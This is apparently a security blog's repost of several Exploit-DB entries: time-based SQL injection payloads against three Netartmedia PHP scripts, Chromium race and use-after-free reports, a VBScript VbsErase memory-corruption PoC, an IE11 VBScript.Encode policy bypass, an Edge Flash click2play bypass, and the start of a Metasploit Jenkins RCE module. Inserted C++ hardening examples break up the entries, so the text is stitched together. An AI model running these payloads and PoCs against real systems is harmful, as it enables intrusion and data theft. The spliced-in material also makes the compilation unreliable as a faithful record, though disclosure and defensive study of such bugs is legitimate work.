Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/mall/
# Demo Site: https://www.phpscriptdemos.com/mall/
# Version: 4.1
# Tested on: Kali Linux
# CVE: N/A
# Description: PHP Mall is one of the first multi-stores and multi-vendors
php scripts (offered since 2006) and successfully used on many websites
today.

----- PoC 1 : SQLi (time-based blind) -----
# Request: http://localhost/[PATH]/index.php
# Parameter: id (GET)
# Payload: id=1 AND SLEEP(5)&item=&lang=en&mod=details

----- PoC 2 : SQLi (time-based blind) -----
# Request: http://localhost/[PATH]/loginaction.php
# Parameter: Email (POST)
# Payload: Email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5) AND 'tOoX'='tOoX&Password=g00dPa$$w0rD&lang=en
            
There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently.

See the comment in the code:

ExtensionsGuestViewMessageFilter::~ExtensionsGuestViewMessageFilter() {
  DCHECK_CURRENTLY_ON(BrowserThread::IO);
  // This map is created and accessed on the UI thread. Remove the reference to
  // |this| here so that it will not be accessed again; but leave erasing the
  // key from the global map to UI thread to avoid races when accessing the
  // underlying data structure (https://crbug.com/869791).
  (*GetProcessIdToFilterMap())[render_process_id_] = nullptr;
  base::PostTaskWithTraits(
      FROM_HERE, BrowserThread::UI,
      base::BindOnce(RemoveProcessIdFromGlobalMap, render_process_id_));
}

This comment doesn't describe behaviour that appears to be safe to me - there's no explicit mention of the safety of concurrent modification of base::flat_map; but it is noted that iterators are invalidated on insertion/erase, so as there is no further synchronisation, it doesn't appear that it is safe to read or write from this map if another thread may be concurrently modifying it.

This issue was detected by TSAN during fuzzing; but I don't think the behaviour is related to the fuzz case - it's just a dormant issue that was caught. I've attached the TSAN splat that resulted, but I don't have a reliable testcase to reproduce this issue.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Ah, you can reproduce this quite easily without even having a compromised renderer. Before I submitted the report to Chrome I thought I should try just spawning lots of renderers, and that repros fairly quickly - still the same (benign, I think) race that's occurring, but that's unsurprising since the renderers in this case aren't doing anything. The attached testcase triggers in < 5 min with a TSAN build.

The testcase assumes that the domains test0.com - test63.com all resolve to your local server.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46566.zip
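The report's point is that a `nullptr` tombstone written from one thread and an erase posted to another are not a synchronisation scheme, because `base::flat_map` provides none itself. The following is an added example (not Chromium code) of the same tombstone-then-erase life cycle with the one thing the quoted code lacks, a mutex around every access. `FilterRegistry`, `Filter` and the stress helper are constructed for this illustration; `std::map` stands in for `base::flat_map`.

```cpp
#include <cstddef>
#include <map>
#include <mutex>
#include <thread>
#include <vector>

// Constructed stand-in for ExtensionsGuestViewMessageFilter: only the id matters.
struct Filter {
  int render_process_id;
};

// A process-id -> filter map shared between the thread that destroys filters
// and the thread that owns the map. The quoted Chromium code writes a nullptr
// "tombstone" from the destructor thread and erases from the owning thread with
// nothing in between; here every access, tombstone included, takes one mutex.
class FilterRegistry {
 public:
  void Register(int pid, Filter* filter) {
    std::lock_guard<std::mutex> lock(mu_);
    map_[pid] = filter;
  }

  // Destructor-thread side: keep the key, drop the pointer, so a later lookup
  // can never hand out a dead filter.
  void Tombstone(int pid) {
    std::lock_guard<std::mutex> lock(mu_);
    auto it = map_.find(pid);
    if (it != map_.end()) it->second = nullptr;
  }

  // Owning-thread side: remove the key (the work the quoted code posts to UI).
  void Erase(int pid) {
    std::lock_guard<std::mutex> lock(mu_);
    map_.erase(pid);
  }

  // nullptr for both unknown and tombstoned ids.
  Filter* Lookup(int pid) const {
    std::lock_guard<std::mutex> lock(mu_);
    auto it = map_.find(pid);
    return it == map_.end() ? nullptr : it->second;
  }

  std::size_t Size() const {
    std::lock_guard<std::mutex> lock(mu_);
    return map_.size();
  }

 private:
  mutable std::mutex mu_;
  std::map<int, Filter*> map_;
};

// Single-threaded check of the tombstone-then-erase life cycle.
bool TombstoneLifecycleOk() {
  FilterRegistry reg;
  Filter f{7};
  reg.Register(7, &f);
  bool live = reg.Lookup(7) == &f;
  reg.Tombstone(7);
  bool hidden = reg.Lookup(7) == nullptr && reg.Size() == 1;  // key kept, pointer gone
  reg.Erase(7);
  bool gone = reg.Size() == 0;
  return live && hidden && gone;
}

// Stress: `workers` threads each cycle register/tombstone/erase on their own id
// while a reader thread polls every id. With the mutex in place TSAN stays
// quiet and the map ends up empty; returns the final size.
std::size_t StressRegistry(int workers, int rounds) {
  FilterRegistry reg;
  std::vector<std::thread> threads;
  for (int w = 0; w < workers; ++w) {
    threads.emplace_back([&reg, w, rounds] {
      Filter f{w};
      for (int r = 0; r < rounds; ++r) {
        reg.Register(w, &f);
        reg.Tombstone(w);
        reg.Erase(w);
      }
    });
  }
  threads.emplace_back([&reg, workers, rounds] {
    for (int i = 0; i < rounds; ++i)
      for (int w = 0; w < workers; ++w) (void)reg.Lookup(w);  // pointer never dereferenced
  });
  for (auto& t : threads) t.join();
  return reg.Size();
}
```

The alternative that avoids the lock altogether is thread confinement: post the tombstone write to the owning thread as well, so the map is only ever touched from one sequence. Either way, the invariant to check under TSAN is that no thread reads or writes the container while another may be modifying it.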
            
There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService.

It looks like the root cause of the issue is that we can get two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback() from the same BindingSet, which results in a data race destroying the same BindingState.

One case where this can be called is in a synchronous context when validating a received message, or when tearing down the connection. The other context is the callback passed to OpenSessionStorage here

https://cs.chromium.org/chromium/src/content/browser/storage_partition_impl.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=912

This is then posted to the mojo task runner thread here:

https://cs.chromium.org/chromium/src/content/browser/dom_storage/dom_storage_context_wrapper.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=433

And can be called on this thread directly here:

https://cs.chromium.org/chromium/src/content/browser/dom_storage/session_storage_context_mojo.cc?rcl=59d4c1b34bfde4fbc31f7a40ab7d0e7df58ffd67&l=140

Since this is a tight race, the repro is not terribly reliable. Opening multiple tabs at once will increase your chances of reproducing to the point where the issue triggers around 50% of the time (on my machine, mileage will vary depending on system load etc...). I found the most convenient way to reproduce was to use a ThreadSanitizer build, but since the most common result is a double-free, this will often crash a normal release build when the freelist corruption is detected.

$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Tsan/chrome --enable-blink-features=MojoJS
--no-sandbox --user-data-dir=/tmp/aa 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html' 'http://localhost:8000/index.html'


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46565.zip
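The root cause described above is two callers (a synchronous validation failure and a posted callback) both tearing down the same `BindingState`. An added example, not Chromium or mojo code, of the one-shot guard that makes such a teardown idempotent: whichever caller flips the flag first owns the destruction, and every later arrival, sequential or concurrent, is a no-op. `BindingState`, `OneShotTeardown` and the thread helpers are constructed for this illustration.

```cpp
#include <atomic>
#include <memory>
#include <thread>
#include <vector>

// Constructed stand-in for a mojo BindingState: counts destructions so the
// test can confirm teardown happened exactly once.
struct BindingState {
  static std::atomic<int> destroyed;
  ~BindingState() { ++destroyed; }
};
std::atomic<int> BindingState::destroyed{0};

// One-shot teardown: exchange() on an atomic flag decides a single winner even
// when callers race; only the winner touches the owned state.
class OneShotTeardown {
 public:
  explicit OneShotTeardown(std::unique_ptr<BindingState> state)
      : state_(std::move(state)) {}

  // Returns true for exactly one caller across all threads.
  bool Fire() {
    if (fired_.exchange(true, std::memory_order_acq_rel)) return false;
    state_.reset();  // reached at most once
    return true;
  }

  bool Fired() const { return fired_.load(std::memory_order_acquire); }

 private:
  std::atomic<bool> fired_{false};
  std::unique_ptr<BindingState> state_;
};

// Sequential double (and more) invocation: only the first call wins.
int SequentialFireCount() {
  BindingState::destroyed = 0;
  OneShotTeardown t(std::unique_ptr<BindingState>(new BindingState));
  int wins = 0;
  for (int i = 0; i < 5; ++i) wins += t.Fire() ? 1 : 0;
  return wins;
}

// Concurrent invocation mirroring the reported race: `callers` threads fire at
// once. Returns the number of winners; BindingState::destroyed stays at 1.
int ConcurrentFireCount(int callers) {
  BindingState::destroyed = 0;
  auto t = std::make_shared<OneShotTeardown>(
      std::unique_ptr<BindingState>(new BindingState));
  std::atomic<int> wins{0};
  std::vector<std::thread> threads;
  for (int i = 0; i < callers; ++i)
    threads.emplace_back([t, &wins] {
      if (t->Fire()) ++wins;
    });
  for (auto& th : threads) th.join();
  return wins.load();
}

int DestroyedCount() { return BindingState::destroyed.load(); }
```

The `shared_ptr` in `ConcurrentFireCount` keeps the guard itself alive for as long as any caller may still invoke it; the guard only protects the state it owns, not its own lifetime, which is the usual second half of fixing this class of bug.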
            
<!--
There is an issue in VBScript in the VbsErase function. In some cases (see the attached PoC), VbsErase fails to clear the argument variable properly, which can trivially lead to crafting a variable with the array type, but with a pointer controlled by an attacker. This issue was most likely introduced in an attempt to fix a previously reported issue in VbsErase (https://bugs.chromium.org/p/project-zero/issues/detail?id=1668).

Debug log (Note: this was tested on Windows 10 64-bit v1809 with the most recent patches applied):

(25b4.efc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e            mov     edi,dword ptr [esi]  ds:002b:13371337=????????

0:009:x86> r
eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44
eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
VBSCRIPT!VbsErase+0x5a:
6e0fc9fa 8b3e            mov     edi,dword ptr [esi]  ds:002b:13371337=????????

0:009:x86> k
 # ChildEBP RetAddr  
00 05c5ca48 6e0beac7 VBSCRIPT!VbsErase+0x5a
01 05c5ca64 6e0b9d64 VBSCRIPT!StaticEntryPoint::Call+0x37
02 05c5cb9c 6e0b8297 VBSCRIPT!CScriptRuntime::RunNoEH+0xc94
03 05c5cbec 6e0b81b5 VBSCRIPT!CScriptRuntime::Run+0xc7
04 05c5ccfc 6e0b354d VBSCRIPT!CScriptEntryPoint::Call+0xe5
05 05c5cd90 6e0ae175 VBSCRIPT!CSession::Execute+0x52d
06 05c5cdd8 6e0c0638 VBSCRIPT!COleScript::ExecutePendingScripts+0x14a
07 05c5ce6c 6e0c03e9 VBSCRIPT!COleScript::ParseScriptTextCore+0x24b
08 05c5ce98 7053ff31 VBSCRIPT!COleScript::ParseScriptText+0x29
09 05c5ced0 7053f847 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
0a 05c5cf40 7053ee02 MSHTML!CScriptCollection::ParseScriptText+0x182
0b 05c5d02c 7053f50e MSHTML!CScriptData::CommitCode+0x312
0c 05c5d0a8 7053e35a MSHTML!CScriptData::Execute+0x1ba
0d 05c5d0c8 7053c526 MSHTML!CHtmScriptParseCtx::Execute+0xaa
0e 05c5d11c 70635a4c MSHTML!CHtmParseBase::Execute+0x186
0f 05c5d13c 70635319 MSHTML!CHtmPost::Broadcast+0x14c
10 05c5d264 7060b4dd MSHTML!CHtmPost::Exec+0x339
11 05c5d284 7060b3d6 MSHTML!CHtmPost::Run+0x3d
12 05c5d2a4 7060b368 MSHTML!PostManExecute+0x60
13 05c5d2b8 7060b2d9 MSHTML!PostManResume+0x6f
14 05c5d2e8 70596767 MSHTML!CHtmPost::OnDwnChanCallback+0x39
15 05c5d300 70637b9b MSHTML!CDwnChan::OnMethodCall+0x27
16 05c5d37c 706381b3 MSHTML!GlobalWndOnMethodCall+0x1cb
17 05c5d3cc 75dc635b MSHTML!GlobalWndProc+0x1f3
18 05c5d3f8 75db729c USER32!_InternalCallWinProc+0x2b
19 05c5d4dc 75db63db USER32!UserCallWinProcCheckWow+0x3ac
1a 05c5d550 75db61b0 USER32!DispatchMessageWorker+0x21b
1b 05c5d55c 71a41e05 USER32!DispatchMessageW+0x10
1c 05c5f6e0 71a413b3 IEFRAME!CTabWindow::_TabWindowThreadProc+0x435
1d 05c5f7a0 724bdf6c IEFRAME!LCIETab_ThreadProc+0x403
1e 05c5f7b8 715b24bd msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
1f 05c5f7f0 75fdfe09 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
20 05c5f800 77ab662d KERNEL32!BaseThreadInitThunk+0x19
21 05c5f85c 77ab65fd ntdll_77a50000!__RtlUserThreadStart+0x2f
22 05c5f86c 00000000 ntdll_77a50000!_RtlUserThreadStart+0x1b
-->


<!-- saved from url=(0016)http://localhost -->
<meta http-equiv="x-ua-compatible" content="IE=10">
<script type="text/vbscript">

Class class5
  Private Sub Class_Terminate()
var4 = &h13371337
ReDim var4(10000000000)
  End Sub
End Class

On Error Resume Next
msgbox "start"
Dim var4(10)
set var4(1) = new class5
Erase var4
Erase var4

</script>
            
Attached is a PoC file that bypasses Flash click2play in Microsoft Edge. This was tested on Windows 10 64bit v 1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com (screenshot attached), but can load a swf from any domain and also the PoC itself can be hosted on any domain. Note that there is a race condition wrt displaying the loaded Flash object, so if you run the PoC and don't see anything after several seconds, please refresh the page or load the PoC again. However, it worked pretty reliably in my experiments.

To see how it works, let's first examine the CObjectElement::FinalCreateObject, which gets called eventually after a new <object> element is created. The code relevant for this vulnerability is:

int CObjectElement::FinalCreateObject(...) {
  CLSID clsid;
  ...
  RetrieveClassidAndData(..., &clsid, ...)
  ...
  if(!COleSite::AllowCreate(this, clsid, ...)) {
    OnFailToCreate();
    return 0x80070005;
  }
  ...
  if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...)) {
    ...
    CView::AddPendingSizeDeterminationOleSite(...)
  } else {
    COleSite::CreateObject(this, clsid);
  }
  ...
}

Looking at the line

if(clsid == CLSID_MacromediaSwFlash && CDOMPluginArray::IsFlashCreateable(...))

you can see that if clsid is Flash clsid and if IsFlashCreateable() returns true, the Flash object will be loaded at a later time. This happens in COleSite::ProcessObjectAfterSizeDetermined after checking if either the user explicitly allowed Flash for this site, or if the site is "trusted by platform". This is how Flash objects are normally loaded.

However, in the opposite case, if clsid != CLSID_MacromediaSwFlash *or* if IsFlashCreateable() returns false (regardless of the clsid), COleSite::CreateObject is called, which creates the object immediately without performing any additional checks. Essentially the logic here in case of clsid == CLSID_MacromediaSwFlash is "If Flash isn't creatable, create the Flash object anyway", which is a bit strange and which is what the PoC exploits.

However, exercising this path is not trivial because of the earlier AllowCreate() check. AllowCreate() and IsFlashCreateable() perform very similar checks - they both eventually call COleSite::AllowCreateSecurityChecks. This means that in most of the cases where IsFlashCreateable() returns false, AllowCreate() returns false as well.

In most cases, but not all :-)

Specifically, in COleSite::AllowCreate, if the current <object> element does not have an associated Markup (is not a part of any element tree), then AllowCreate() calls COleSite::AllowCreateSecurityChecks() with the 4th argument set to 0. This has the effect that most checks will be skipped and AllowCreate() will return true (almost) always.

Now we just need to make CDOMPluginArray::IsFlashCreateable return false, and in the PoC this is done by making the associated document of the current <object> element a "dynamic" document.

This way, COleSite::CreateObject is called without click2play checks.

However, if we leave a PoC at this stage, there is going to be a (non-fatal) exception in communication between the Content Process and the Plugin Process. I'm not sure if this happens before or after the Flash object is actually loaded. In any case, we can avoid this by quickly putting the <object> element into a "normal" document tree. This also causes the Flash object to be shown on the page normally, for a dramatic effect :-)

Please also note that most of the logic shown above for CObjectElement::FinalCreateObject is also present in CPluginSite::FinishCreateObject, which is used for handling for example <embed> elements. While the current PoC does not work on <embed> elements as is, it might be possible to make it work with some modifications. So, when fixing CObjectElement::FinalCreateObject, please remember to also address CPluginSite::FinishCreateObject.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46569.zip
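The flaw above is a branch shape, not a missing check: a negative answer from `IsFlashCreateable()` lands in the `else` branch that creates the object with no further checks. An added example (not MSHTML code; the enums, field names and the modelling of "dynamic document" as the condition that fails the full checks are assumptions) that reduces the report's description to a small decision model and puts the fail-closed shape beside it.

```cpp
// Constructed model of what the report says CObjectElement::FinalCreateObject
// consults; names are assumptions, not MSHTML's.
enum class Clsid { kFlash, kOther };
enum class Outcome { kDenied, kCreatedWithChecks, kCreatedImmediately };

struct ObjectElement {
  Clsid clsid;
  bool has_markup;        // element belongs to an element tree
  bool document_dynamic;  // associated document is a "dynamic" document
};

// Both gates funnel into the same security checks. Per the report, AllowCreate()
// runs them in skip-most-checks mode when the element has no Markup, while
// IsFlashCreateable() always runs them in full. The dynamic document is
// modelled as the condition that makes the full checks fail.
bool AllowCreateSecurityChecks(const ObjectElement& e, bool full) {
  if (!full) return true;
  return !e.document_dynamic;
}
bool AllowCreate(const ObjectElement& e) {
  return AllowCreateSecurityChecks(e, /*full=*/e.has_markup);
}
bool IsFlashCreateable(const ObjectElement& e) {
  return AllowCreateSecurityChecks(e, /*full=*/true);
}

// Branch structure as quoted in the report: Flash that is *not* creatable
// falls through to the else branch and is created with no further checks.
Outcome FinalCreateObjectAsReported(const ObjectElement& e) {
  if (!AllowCreate(e)) return Outcome::kDenied;
  if (e.clsid == Clsid::kFlash && IsFlashCreateable(e))
    return Outcome::kCreatedWithChecks;  // deferred path with click2play checks
  return Outcome::kCreatedImmediately;   // COleSite::CreateObject
}

// Fail-closed shape (a general hardening pattern, not Microsoft's patch): a
// negative answer from the Flash-specific gate is a denial, never a fallback
// into the unchecked creation path.
Outcome FinalCreateObjectFailClosed(const ObjectElement& e) {
  if (!AllowCreate(e)) return Outcome::kDenied;
  if (e.clsid == Clsid::kFlash) {
    if (!IsFlashCreateable(e)) return Outcome::kDenied;
    return Outcome::kCreatedWithChecks;
  }
  return Outcome::kCreatedImmediately;
}

// The configuration the report describes: detached <object>, dynamic document.
ObjectElement DetachedFlashInDynamicDocument() { return {Clsid::kFlash, false, true}; }
// An ordinary Flash <object> in a normal document tree.
ObjectElement NormalFlash() { return {Clsid::kFlash, true, false}; }
```

When reviewing code of this shape, the question to ask of every `if (A && B)` guarding a privileged path is what happens when `A` is true and `B` is false; here it is the unguarded path, which is the whole bug.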
            
<!--
Windows: IE11 VBScript execution policy bypass in MSHTML
Platform: Windows 10 1809 (not tested earlier)
Class: Security Feature Bypass

Summary:
MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesn’t check other VBScript CLSIDs which allow a web page to bypass the security zone policy.

Description:
According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.

The check for the VBScript security zone policy is done in MSHTML!AllowVBScript which is only called from MSHTML!CScriptCollection::GetHolderCLSID if the script language CLSID matches {b54f3741-5b07-11cf-a4b0-00aa004a55e8}. However, IE still supports the old VBScript.Encode language which has a slightly different CLSID of {b54f3743-5b07-11cf-a4b0-00aa004a55e8}. Therefore to bypass the VBScript zone security policy it’s possible to just change the language attribute in the HTML from “VBScript” to “VBScript.Encode”. To add insult to injury you don’t even need to encode the VBScript, as if the engine detects the script is not encoded it tries to parse it as unencoded script.

Proof of Concept:

I’ve provided a PoC as an HTML file with a meta tag to force IE5 compatibility. Just host on an HTTP server.

1) Browse IE11 to the PoC on the web server.

Expected Result:
No VBScript is executed.

Observed Result:
VBScript is executed and a message box is displayed.
-->

<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=5">
</head>
<body>
<script language="VBScript.Encode">
MsgBox "Hello"
</script>
</body>
</html>
            
MidiManagerWin uses a similar instance_id mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive. 

However, this instance_id is an int, and there is no check that it hasn't overflowed, unlike in the linux and mac implementations (MidiManagerAlsa), see https://cs.chromium.org/chromium/src/media/midi/midi_manager_alsa.cc?rcl=282aae73b9d2c1cbf12d3c39a8d3d2612e4b1876&l=175

This means that if (for example) a delayed sendData on a stale MidiManagerWin instance is queued up, and then the instance id is wrapped, this will trigger a use-after-free when that task triggers.

This bug would be theoretically reachable directly from javascript, but I think that since it's not possible to directly tear down a midi session using the WebMIDI api that this would require too much time to be feasible (as it would require creating a new frame for every increment). However, it can be triggered in a reasonable amount of time from a compromised renderer making direct Mojo calls.

The timing required for the resulting code is quite sensitive to changes in the order of Mojo messages being received; my original approach needed 6 months, but I have the time needed to cause the overflow down to ~4 days from a compromised renderer using the MojoJS javascript bindings.

I've attached a PoC (using the MojoJS bindings) that demonstrates the issue in a more convenient amount of time for testing if you patch the variable `static int id` in IssueNextInstanceId to a `static short`. Runtime will also be shorter if you run the PoC directly after booting; it also has to synchronise clocks with the system clock, and I haven't put any work into making that quick.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46570.zip
            
There's a comment in FileSystemOperationRunner::BeginOperation

OperationID FileSystemOperationRunner::BeginOperation(
    std::unique_ptr<FileSystemOperation> operation) {
  OperationID id = next_operation_id_++;

  // TODO(https://crbug.com/864351): Diagnostic to determine whether OperationID
  // wrap-around is occurring in the wild.
  DCHECK(operations_.find(id) == operations_.end());

  // ! If id already in operations_, this will free operation
  operations_.emplace(id, std::move(operation));
  return id;
}

The id is an int, and it can wrap, and if it does this will cause a use-after-free in the browser process, since the normal usage of BeginOperation is the following:

OperationID FileSystemOperationRunner::Truncate(const FileSystemURL& url,
                                                int64_t length,
                                                StatusCallback callback) {
  base::File::Error error = base::File::FILE_OK;
  std::unique_ptr<FileSystemOperation> operation = base::WrapUnique(
      file_system_context_->CreateFileSystemOperation(url, &error));
  // ! take a raw pointer to the contents of the unique_ptr
  FileSystemOperation* operation_raw = operation.get();
  // ! call BeginOperation passing the move'd unique_ptr, freeing operation
  OperationID id = BeginOperation(std::move(operation));
  base::AutoReset<bool> beginning(&is_beginning_operation_, true);
  if (!operation_raw) {
    DidFinish(id, std::move(callback), error);
    return id;
  }
  PrepareForWrite(id, url);
  // ! use the raw free'd pointer here.
  operation_raw->Truncate(url, length,
                          base::BindOnce(&FileSystemOperationRunner::DidFinish,
                                         weak_ptr_, id, std::move(callback)));
  return id;
}

I think that to trigger this, you'd need either a malformed blob in the blob registry, or access to the FileWriter api, so at present this would require a compromised renderer.

I've attached two PoCs that should trigger this issue; it looks like the runtime for either approach from javascript should take ~2 days on my machine. (I'd suggest patching the OperationId typedef to short to reproduce, unless you are extremely patient).

$ python ./copy_mojo_js_bindings.py /path/to/chrome/.../out/Asan/gen
$ python -m SimpleHTTPServer&
$ /ssd/chrome_trunk/src/out/Asan/chrome --enable-blink-features=MojoJS --user-data-dir=/tmp/aa 'http://localhost:8000/id_overflow_no_filewriter.html'


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46571.zip
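Both this report and the MidiManagerWin one above are the same bug shape: an `int` id counter wraps, a stale entry still holds the old id, and ownership or a delayed task then goes to the wrong object. The added example below (not Chromium code) does two things: it reproduces, with an 8-bit id so the wrap is reachable in a test, exactly why `map::emplace` on an existing key frees the moved-in `unique_ptr` while the caller still holds the raw pointer taken beforehand; and it shows a hardened runner that fails closed on collision or counter exhaustion and only fetches the raw pointer from the owning map after insertion succeeded. `Operation`, `RunnerAsQuoted`, `RunnerHardened` and the 8-bit `OperationId` are constructed for this illustration; Chromium's id type is `int`.

```cpp
#include <cstddef>
#include <cstdint>
#include <limits>
#include <map>
#include <memory>
#include <utility>

// Constructed stand-in for FileSystemOperation (or, for the MidiManagerWin
// report, any object a delayed task may still refer to by id).
struct Operation {
  static int destroyed;
  ~Operation() { ++destroyed; }
  int Run() { return 1; }
};
int Operation::destroyed = 0;

// 8-bit on purpose so the wrap is reachable in a test (the report suggests
// `short` for the same reason); the real type is int.
using OperationId = uint8_t;

// Mirrors BeginOperation()/Truncate() as quoted: emplace() builds the node
// before checking the key, so on an id collision the freshly moved-in
// unique_ptr is destroyed at once and the raw pointer taken earlier dangles.
class RunnerAsQuoted {
 public:
  OperationId Begin(std::unique_ptr<Operation> op) {
    OperationId id = next_id_++;          // wraps modulo 256 with no check
    operations_.emplace(id, std::move(op));
    return id;
  }
  // True if the operation the caller still holds a raw pointer to was freed by
  // Begin(), i.e. the use-after-free is one Run() away.
  bool TruncateWouldUseFreed() {
    std::unique_ptr<Operation> op(new Operation);
    Operation* raw = op.get();            // raw pointer taken before handing over
    int before = Operation::destroyed;
    Begin(std::move(op));
    (void)raw;                            // would be raw->Truncate(...) in Chromium
    return Operation::destroyed != before;
  }
  std::size_t Live() const { return operations_.size(); }

 private:
  OperationId next_id_ = 0;
  std::map<OperationId, std::unique_ptr<Operation>> operations_;
};

// Hardened variant (a general fix pattern, not Chromium's patch): refuse an id
// that is still live or past the counter's range, and take the raw pointer
// from the owning map only after insertion succeeded.
class RunnerHardened {
 public:
  bool Begin(std::unique_ptr<Operation> op, OperationId* out_id) {
    if (exhausted_) return false;
    OperationId id = next_id_;
    if (operations_.find(id) != operations_.end()) return false;  // fail closed
    operations_.emplace(id, std::move(op));
    if (next_id_ == std::numeric_limits<OperationId>::max()) exhausted_ = true;
    else ++next_id_;
    *out_id = id;
    return true;
  }
  // Returns the operation's result, or -1 when no id could be issued.
  int Truncate() {
    OperationId id;
    if (!Begin(std::unique_ptr<Operation>(new Operation), &id)) return -1;
    return operations_.at(id)->Run();     // looked up by id, never pre-taken
  }
  void Finish(OperationId id) { operations_.erase(id); }
  std::size_t Live() const { return operations_.size(); }

 private:
  bool exhausted_ = false;
  OperationId next_id_ = 0;
  std::map<OperationId, std::unique_ptr<Operation>> operations_;
};

// 256 operations exhaust the 8-bit id space; the 257th collides with id 0 and
// is freed under the caller's feet while the map still holds 256 entries.
bool QuotedRunnerFreesOnWrap() {
  RunnerAsQuoted r;
  for (int i = 0; i < 256; ++i) r.Begin(std::unique_ptr<Operation>(new Operation));
  return r.TruncateWouldUseFreed() && r.Live() == 256;
}

// Same scenario against the hardened runner: the 257th request is refused
// before any raw pointer exists.
int HardenedRunnerResultOnWrap() {
  RunnerHardened r;
  for (int i = 0; i < 256; ++i) (void)r.Truncate();
  return r.Truncate();
}

int HardenedRunnerFirstResult() {
  RunnerHardened r;
  return r.Truncate();
}
```

In production the simpler answer is a 64-bit counter, which cannot wrap in any realistic lifetime; the collision check and the lookup-after-insert ordering remain worth keeping as defence in depth, and `std::map::try_emplace` (C++17) avoids the construct-then-discard behaviour that makes the quoted `emplace` free the operation.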
            
# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/propertyagency/
# Demo Site: https://www.phpscriptdemos.com/agency/
# Version: 4.0
# Tested on: Kali Linux
# CVE: N/A
# Description: PHP Real Estate Agency is web software written in PHP,
designed especially for real estate agencies to help them quickly create
and launch their own websites with their listings and information.
----- PoC SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: features[] (POST)
Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1
            
# Exploit Title: Netartmedia PHP Car Dealer - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/autodealer/
# Demo Site: https://www.phpscriptdemos.com/autodealer/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
# Description: The PHP Car Dealer script also uses a flexible template
system - the templates can be modified or new ones created in order to
completely customize the website look and feel.

----- PoC 1 SQLi -----

Request: http://localhost/[PATH]/index.php

Parameter features[] (POST)

Payload:body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Jenkins ACL Bypass and Metaprogramming RCE',
      'Description'    => %q{
        This module exploits a vulnerability in Jenkins dynamic routing to
        bypass the Overall/Read ACL and leverage Groovy metaprogramming to
        download and execute a malicious JAR file.

        The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
        on later versions of Jenkins.

